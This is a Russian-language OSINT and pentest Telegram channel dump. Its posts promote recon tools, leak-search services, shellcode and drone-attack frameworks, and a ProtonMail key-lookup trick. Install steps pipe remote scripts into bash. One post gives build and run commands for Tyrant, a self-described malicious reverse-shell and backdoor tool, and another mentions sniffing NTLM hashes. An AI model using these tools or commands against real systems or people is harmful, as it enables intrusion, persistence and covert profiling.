Заметки OSINTера
6.59K subscribers
2.15K photos
201 videos
299 files
3.36K links
Download Telegram
Forwarded from Codeby
🎇 SysReptor

Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.


❗️Решает одну из ключевых проблем, (которую так не любят делать технические специалисты) — стандартизацию и автоматизацию отчётности.

🧿Основные возможности
⏺️поддержка Markdown;
⏺️полная кастомизация через HTML и CSS;
⏺️поддержка экспорта в PDF;
⏺️развертывание на собственном сервере или в облаке.

⬇️Установка
Устанавливаем дополнительные компоненты, Docker и скачиваем установочный скрипт инструмента:
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)

Веб-приложение будет доступно по адресу http://127.0.0.1:8000/

🔑Разработка отчетов
Конструктор отчетов позволяет полностью настроить внешний вид и структуру итоговых отчетов в формате PDF. Ограничений по дизайну нет, поэтому вы можете адаптировать отчеты под свои нужды.

Существует два основных подхода к созданию отчетов:
1️⃣ Начать с существующего шаблона (скопировать существующий шаблон отчета из раздела и изменить его в соответствии со своими требованиями).
2️⃣ Начать создавать отчет нуля:
➡️определить поля отчета и поля находок (уязвимостей);
➡️определить базовую структуру отчета в редакторе макетов;
➡️настроить HTML и CSS в соответствии со своими потребностями с помощью редакторов кода.

Существует возможность использовать также и готовые фрагменты HTML и CSS, которые упрощают процесс создания отчетов. Они содержат часто используемые элементы отчетов (титульный лист, верхний и нижний колонтитулы, оглавление, список выводов, приложения и т. д.), которые можно легко настроить в соответствии с конкретными потребностями.

🔁Шаблоны уязвимостей
Одна из самых полезных функций для ИБ-специалистов, которая позволяет ускорить дальнейшую подготовку отчетов. Они содержат общие описания результатов и уязвимостей. Таким образом, описав результаты один раз в шаблоне, далее можно использовать их в различных отчетах.

#tools #reports #pentesting

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
** Credentials, leaks & cybercrime intelligence

🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt

🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne

🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin

🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme

🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy



** Internet exposure & infrastructure intelligence

🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly

🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric

🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret

🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy

🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed

🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed

🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang

🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero

🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris

🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary

🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger

🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔥1
🖥 Репозиторий: Sickle — Инструментарий для разработки и анализа полезных нагрузок

Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.

— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.

Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)

#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)

@hackernews_lib
🔎 EUOSINT — комплекс инструментов OSINT для расширенного глобального мониторинга разведывательной информации, анализа ситуации и выявления рисков.

🔎 https://github.com/scalytics/EUOSINT
🔎 https://osint.scalytics.io/

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔎 Пассивная разведка сайта: как собрать инфу, не трогая цель разбираем тему, как и как и обещали в чате

Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.

👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)

Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели

📦 Что можно узнать:

• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников

🛠 Инструменты:

— Amass
— theHarvester
— Shodan
— Censys

💡 Пример:

Ты находишь поддомен вида:
dev.example.com


А там — тестовая среда без защиты. Уже можно черпать очень много информации.

Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).

🪧Информация о компании, которая может быть полезной:

Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?

Полезная информация о сотруднике:

Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?

🎯 Итог:

Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.

Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.

👉 Здесь решает не количество инструментов,
а умение связывать факты:

один поддомен → один email → один сотрудник → одна точка входа


💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.

#osint #recon #пассивнаяраздведка
🔎 Мини-алгоритм пассивной разведки (OSINT)

Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:

1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)

2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы

(через Amass, Censys)

3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции

4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков

(через theHarvester, Shodan)

5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети

6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе

7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура

🎯 Итог:

Пассивка — это не просто сбор данных,
а последовательная сборка пазла.


#osint #recon #пассивнаяраздведка
Программируемая поисковая система Google PSE, ранее известная как Custom Search Engine (CSE), — это малоиспользуемый, но мощный инструмент для OSINT-расследований.

📎 https://programmablesearchengine.google.com/

PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.

Подборки Google PSE для OSINT:
📎 https://github.com/paulpogoda/OSINT-CSE
📎 https://github.com/The-Osint-Toolbox/Custom-Search-Engines
📎 https://www.freesourcingtools.com/google-cse
📎 https://booleanstrings.com/all-the-40-forty-custom-search-engines/

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
⚔️ Активная разведка сайта: когда ты начинаешь “стучаться” в цель

Если пассивка — это наблюдение,
то активная разведка — это уже действие.


👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)

Почему это важно?

— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке

⚠️ Но есть нюанс:

— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно


📦 Что сюда входит:

• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа

🛠 Инструменты:

Nmap
— Gobuster
ffuf
Burp Suite

💡 Пример:

Ты находишь поддомен через пассивку →
test.example.com


Дальше:

— сканируешь порты
— находишь admin-панель
— проверяешь параметры

И вот тут уже начинаются реальные уязвимости

🎯 Важно:

Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар

#osint #активнаяраздведка
🔎 Мини-алгоритм активной разведки (OSINT)

1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки

2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны

👉 Отсекаешь всё лишнее

3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита

👉 Понимаешь, с чем имеешь дело

4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev

👉 Очень часто здесь лежит самое интересное

5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах

👉 Ищешь аномалии

6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов

👉 Смотришь, как система обрабатывает данные

7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов

👉 Ловишь ошибки логики

8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы

👉 Формируешь векторы атаки


🎯 Вывод:

Активная разведка
— это не “запустить сканер и ждать”.

Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.


#osint #активнаяраздведка
Forwarded from Codeby
Tyrant

Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.


📐Основные характеристики:
📉Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.

⬇️Установка:
0️⃣Клонирование репозитория и переход в рабочую директорию:
git clone https://github.com/MartinxMax/Tyrant.git

cd Tyrant/


1️⃣Установка зависимостей:
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev


2️⃣Компиляция бинарного файла:
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd


⛓️‍💥Запуск:
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]


#web

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 Gobuster: как находить скрытые директории и поддомены

Одна из самых частых ошибок новичков —
думать, что если страница не видна, значит её нет.


👉 На практике — она просто скрыта.

📌 Gobuster:

— перебирает директории (/admin, /backup, /dev)
— ищет скрытые файлы
— может находить поддомены

💡 Пример:

gobuster dir -u http://target.com -w wordlist.txt


📦 Что можно найти:

• админ-панели
• тестовые разделы
• резервные копии
• скрытые API
• забытые страницы

⚡️ Важно:

— хороший словарь = 50% успеха
— не все 200 ответы полезны
— обращай внимание на размер ответа
— фильтруй мусор


💣 Частая ошибка:

Запустить Gobuster “в лоб” без пассивки

👉 Запомни:
сначала собрать поддомены →
потом уже брутить директории точечно

🔥 Мини-лайфхаки:

— проверяй /robots.txt перед запуском
— используй разные словари
— смотри не только на статус, но и на контент
— ищи нестандартные ответы


🎯 Вывод:

Gobuster — это не просто перебор слов,
а инструмент для поиска скрытых точек входа.

#tools #gobuster
🔎 THE BIG BROTHER V4.0 — платформа для анализа открытых источников информации (OSINT). Включает перечисление имен пользователей, визуальную разведку с использованием четырехвекторного анализа, отслеживание с помощью Sky Radar, анализ криптокошельков, разведку SSL-трафика, восстановление цифрового следа, извлечение EXIF-данных, расширенную разведку сети и сетевую разведку.

📎 https://github.com/chadi0x/TheBigBrother

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Detective
Best OSINT resources

List by OsintTeamBlog (updated last month):

Youtube channels
Newsletters
Blogs
Podcasts
CTFs and hackathons

https://www.osintteam.com/resources/
Меня часто спрашивают: можно ли хоть что-то узнать об анонимном почтовом ящике Protonmail, кроме самого адреса? Короткий ответ — да, кое-что можно. Не пароль, не переписку, конечно, но технические метаданные — вполне.

Сегодня покажу простой способ получить дату и время создания ящика. Это не взлом и не «пробив» в классическом понимании, а легальный запрос к открытому API Protonmail. Такая информация бывает полезна в расследовании: например, вы видите, что ящик создан через час после какого-то события, или, наоборот, существовал уже несколько лет. Цепочка косвенных улик иногда говорит больше, чем прямой ответ. Метод работает для большинства активных ящиков Protonmail, если пользователь не отключил публичный PGP-ключ (по умолчанию он включён).

Пусть у нас есть ящик: gabaigaduka@protonmail.com. Мы не знаем, кто за ним стоит, но хотим понять, когда его зарегистрировали. Protonmail предоставляет публичный эндпоинт для проверки PGP-ключей. В том числе через него можно получить метаинформацию о ящике. Вбиваем в браузере или через curl такой URL:

https://api.protonmail.ch/pks/lookup?op=index&search=gabaigaduka@protonmail.com


В ответ приходит несколько строк. Нас интересует та, что начинается с pub:. В ней есть числовая метка — Unix timestamp.

info:1:1
pub:cc0322777176da3a4a4d9916e4f32c96c55663a4:1:2048:1527584191::
uid:gabaigaduka@protonmail.com <gabaigaduka@protonmail.com>:1527584191::


Видите число 1527584191? Это и есть время создания ящика в секундах, прошедших с 1 января 1970 года. Только выглядит оно не очень читаемо. Идём на сайт epochconverter.com (или любой другой онлайн-конвертер Unix timestamp). Вставляем туда 1527584191 и получаем 29 мая 2018 года, около 15:36 по UTC. То есть ящик создан в конце весны 2018-го. Уже что-то.

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
Сколько раз мы с вами сталкивались с одной и той же проблемой: нужно быстро подобрать инструмент под конкретную задачу, а в закладках — сотни ссылок, половина из которых мертва, а вторая — просто бесполезна. Где-то лежит один парсер, где-то — другой, а вспомнить, чем ты пользовался в прошлом кейсе, уже нереально.

The OSINT Tools Librarytools.osintnewsletter.com

Это не очередная простыня из «100500 инструментов для всех случаев». Авторы подошли к делу с практической стороны: каталог курируется под конкретные задачи расследователя. Внутри — только то, что реально применялось в делах, а не скопировано с соседнего сайта.


📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Codeby
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО

Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.


🧿Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)

⬇️Установка
pipх install quickscope

Проверка
quickscope -h


⏺️Базовый анализ
python quickscope --file suspicious_file.exe --analyze


⏺️Быстрый анализ подозрительного EXE-файла
python quickscope --file unknown_sample.exe --analyze --vtFile


⏺️Глубокий анализ документа с извлечением макросов
python quickscope --file invoice.doc --docs


⏺️Проверка APK на наличие вредоносного поведения
#cтатический анализ
python quickscope --file malicious.apk --analyze

#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch


⏺️Пакетное сканирование коллекции образцов
python quickscope --folder ./malware_collection --hashscan


⏺️Извлечение индикаторов компрометации
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'


#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Soxoj insides (Soxoj)
🎭 ShareTrace: reveal the identity behind any share link

Works for 12 platforms: TikTok, Instagram, Discord, Google Drive, Notion, Telegram, Pinterest, Substack, Suno, ChatGPT, Claude, Perplexity.

Original repo was deleted — I rebuilt it with new platforms and fixes.

👉 https://github.com/soxoj/sharetrace
🖥 Репозиторий: Dronesploit — фреймворк для пентестинга и эксплуатации уязвимостей дронов

Dronesploit — это комплексный набор инструментов и фреймворк, разработанный для анализа безопасности беспилотных летательных аппаратов (БПЛА).

— Он предоставляет исследователям безопасности и пентестерам средства для выявления, изучения и эксплуатации потенциальных уязвимостей в системах дронов, а также для оценки их защищенности от различных атак.

Включает модули для разведки, сканирования и эксплуатации различных протоколов связи дронов; поддерживает множество производителей и моделей БПЛА; предоставляет инструменты для перехвата данных, спуфинга GPS и других методов атаки; предназначен для этичного тестирования безопасности и научных исследований.

Ссылка на GitHub (https://github.com/dronesploit/dronesploit)

#Cybersecurity #IoT #Pentest #Hacking #OpenSource #Drone | Лаборатория хакера (https://max.ru/lab_hack)

@hackernews_lib
Forwarded from Codeby
WebSift

WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.


📐Функции
📉Собирает адреса электронной почты с заданного веб-сайта.
📉Извлекает номера телефонов в стандартных форматах.
📉Собирает ссылки на социальные сети и другие URL-адреса с веб-сайтов для расширения возможностей OSINT.
🖱Сохраняет извлеченную информацию для дальнейшего анализа.

⬇️Установка:
🔗Клонируем репозиторий и переходим в рабочую директорию:
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git

cd WebSift/

cd WebSift/


⛓️‍💥Запуск:
bash websift.sh


#web #pentest #OSINT

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
🔍 80% успешных атак рождаются до запуска эксплойта

Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.

🛠 Цепочка из четырёх инструментов для полного цикла разведки:

1. masscan — прочёсывает /16-подсети за минуты, но с --rate=1000 — иначе положишь клиентскую сеть
2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели

💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.

Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:

https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/